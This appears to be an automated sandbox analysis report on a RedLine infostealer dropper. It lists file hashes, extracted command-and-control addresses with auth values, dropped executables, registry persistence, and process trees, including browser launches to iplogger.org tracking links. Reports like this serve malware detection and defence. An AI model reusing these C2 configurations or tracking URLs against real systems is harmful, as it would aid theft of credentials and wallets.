redline | 6228a057bf70d95e0f6cd3a5639d02e4155c84f7da9fd29bf879e3473d37d86d

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220722-en
resource tags

arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
submitted
11-08-2022 22:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
Size

902KB
MD5

e6ae2071837c90e79a7f4c6e8e778f0f
SHA1

b340afd00d6feb4da15b9b10446417e51d3f7082
SHA256

ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396
SHA512

6e1662cc172d0001fb2de054eaff5dc8c9ba041cbec00a42d8311c92958e1b4690454262106ac26d0eed85863e2142dc5d4161a98c7cbabbcb6b083e7d02b59c

Score

10^/10

redline 4 5076357887 @tag12312341 nam3 discovery infostealer persistence spyware stealer

Malware Config

Extracted

Family

redline

Botnet

nam3

103.89.90.61:34589

Attributes

auth_value
64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

31.41.244.134:11643

Attributes

auth_value
a516b2d034ecd34338f12b50347fbd92

Extracted

Family

redline

Botnet

@tag12312341

62.204.41.144:14096

Attributes

auth_value
71466795417275fac01979e57016e277

Extracted

Family

redline

Botnet

5076357887

195.54.170.157:16525

Attributes

auth_value
0dfaff60271d374d0c206d19883e06f3

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 12 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	family_redline
behavioral2/memory/4980-207-0x00000000006D0000-0x0000000000714000-memory.dmp	family_redline
behavioral2/memory/3156-206-0x0000000000180000-0x00000000001A0000-memory.dmp	family_redline
behavioral2/memory/4240-205-0x0000000000EF0000-0x0000000000F10000-memory.dmp	family_redline
behavioral2/memory/3516-200-0x0000000000540000-0x0000000000560000-memory.dmp	family_redline

Executes dropped EXE 9 IoCs

Processes:

F0geI.exekukurzka9000.exenamdoitntn.exenuplat.exereal.exesafert44.exetag.exejshainx.exeme.exe

pid process

4524 F0geI.exe
376 kukurzka9000.exe
3516 namdoitntn.exe
3152 nuplat.exe
5052 real.exe
4980 safert44.exe
3156 tag.exe
4240 jshainx.exe
1136 me.exe

pid	process
4524	F0geI.exe
376	kukurzka9000.exe
3516	namdoitntn.exe
3152	nuplat.exe
5052	real.exe
4980	safert44.exe
3156	tag.exe
4240	jshainx.exe
1136	me.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 11 IoCs

Processes:

ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exesetup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\safert44.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\tag.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jshainx.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\me.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\nuplat.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\real.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220812002417.pma	setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\F0geI.exe	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b1de5b0d-4222-4917-a942-c00d655682ef.tmp	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

6780 4524 WerFault.exe F0geI.exe

pid	pid_target	process	target process
6780	4524	WerFault.exe	F0geI.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

nuplat.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	nuplat.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	nuplat.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exenuplat.exejshainx.exesafert44.exenamdoitntn.exetag.exeidentity_helper.exemsedge.exe

pid	process
5284	msedge.exe
5284	msedge.exe
5240	msedge.exe
5240	msedge.exe
5260	msedge.exe
5260	msedge.exe
5272	msedge.exe
5272	msedge.exe
5328	msedge.exe
5328	msedge.exe
5316	msedge.exe
5316	msedge.exe
5296	msedge.exe
5296	msedge.exe
4896	msedge.exe
4896	msedge.exe
3152	nuplat.exe
3152	nuplat.exe
4240	jshainx.exe
4240	jshainx.exe
4980	safert44.exe
4980	safert44.exe
3516	namdoitntn.exe
3516	namdoitntn.exe
3156	tag.exe
3156	tag.exe
5776	identity_helper.exe
5776	identity_helper.exe
3596	msedge.exe
3596	msedge.exe
3596	msedge.exe
3596	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exe

pid	process
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

jshainx.exesafert44.exenamdoitntn.exetag.exe

description	pid	process
Token: SeDebugPrivilege	4240	jshainx.exe
Token: SeDebugPrivilege	4980	safert44.exe
Token: SeDebugPrivilege	3516	namdoitntn.exe
Token: SeDebugPrivilege	3156	tag.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msedge.exe

pid process

4896 msedge.exe
4896 msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	pid	process	target process
PID 3144 wrote to memory of 4548	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 4548	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 3464	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 3464	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 4896	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 4896	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 1444	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 1444	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 1160	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 1160	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 2992	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 2992	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 4548 wrote to memory of 1948	4548	msedge.exe	msedge.exe
PID 4548 wrote to memory of 1948	4548	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4544	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4544	4896	msedge.exe	msedge.exe
PID 3464 wrote to memory of 768	3464	msedge.exe	msedge.exe
PID 3464 wrote to memory of 768	3464	msedge.exe	msedge.exe
PID 1444 wrote to memory of 488	1444	msedge.exe	msedge.exe
PID 1444 wrote to memory of 488	1444	msedge.exe	msedge.exe
PID 1160 wrote to memory of 4520	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 4520	1160	msedge.exe	msedge.exe
PID 2992 wrote to memory of 4232	2992	msedge.exe	msedge.exe
PID 2992 wrote to memory of 4232	2992	msedge.exe	msedge.exe
PID 3144 wrote to memory of 3276	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3144 wrote to memory of 3276	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	msedge.exe
PID 3276 wrote to memory of 4212	3276	msedge.exe	msedge.exe
PID 3276 wrote to memory of 4212	3276	msedge.exe	msedge.exe
PID 3144 wrote to memory of 4524	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	F0geI.exe
PID 3144 wrote to memory of 4524	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	F0geI.exe
PID 3144 wrote to memory of 4524	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	F0geI.exe
PID 3144 wrote to memory of 376	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	kukurzka9000.exe
PID 3144 wrote to memory of 376	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	kukurzka9000.exe
PID 3144 wrote to memory of 376	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	kukurzka9000.exe
PID 3144 wrote to memory of 3516	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	namdoitntn.exe
PID 3144 wrote to memory of 3516	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	namdoitntn.exe
PID 3144 wrote to memory of 3516	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	namdoitntn.exe
PID 3144 wrote to memory of 3152	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	nuplat.exe
PID 3144 wrote to memory of 3152	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	nuplat.exe
PID 3144 wrote to memory of 3152	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	nuplat.exe
PID 3144 wrote to memory of 5052	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	real.exe
PID 3144 wrote to memory of 5052	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	real.exe
PID 3144 wrote to memory of 5052	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	real.exe
PID 3144 wrote to memory of 4980	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	safert44.exe
PID 3144 wrote to memory of 4980	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	safert44.exe
PID 3144 wrote to memory of 4980	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	safert44.exe
PID 3144 wrote to memory of 3156	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	tag.exe
PID 3144 wrote to memory of 3156	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	tag.exe
PID 3144 wrote to memory of 3156	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	tag.exe
PID 3144 wrote to memory of 4240	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	jshainx.exe
PID 3144 wrote to memory of 4240	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	jshainx.exe
PID 3144 wrote to memory of 4240	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	jshainx.exe
PID 3144 wrote to memory of 1136	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	me.exe
PID 3144 wrote to memory of 1136	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	me.exe
PID 3144 wrote to memory of 1136	3144	ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe	me.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe
PID 1160 wrote to memory of 1468	1160	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe
"C:\Users\Admin\AppData\Local\Temp\ba66c7a46a35c1b38aa76a199ae19a65674786771b153e0fadc62fcd28367396.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AbtZ4
2⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc3d5446f8,0x7ffc3d544708,0x7ffc3d544718
3⤵
PID:1948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2437289507424822613,7763714770855815914,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
3⤵
PID:4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,2437289507424822613,7763714770855815914,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC4
2⤵
- Suspicious use of WriteProcessMemory
PID:3464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc3d5446f8,0x7ffc3d544708,0x7ffc3d544718
3⤵
PID:768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,12089512006251263629,10488883860805520117,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
3⤵
PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,12089512006251263629,10488883860805520117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK4
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc3d5446f8,0x7ffc3d544708,0x7ffc3d544718
3⤵
PID:4544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
3⤵
PID:5124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
3⤵
PID:5344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
3⤵
PID:5236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
3⤵
PID:6172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1
3⤵
PID:6412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
3⤵
PID:6532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
3⤵
PID:6628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
3⤵
PID:6688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
3⤵
PID:6772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
3⤵
PID:6912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6684 /prefetch:8
3⤵
PID:6408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
3⤵
PID:6676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11112529086189705983,14258334057020097968,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
3⤵
PID:5900

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
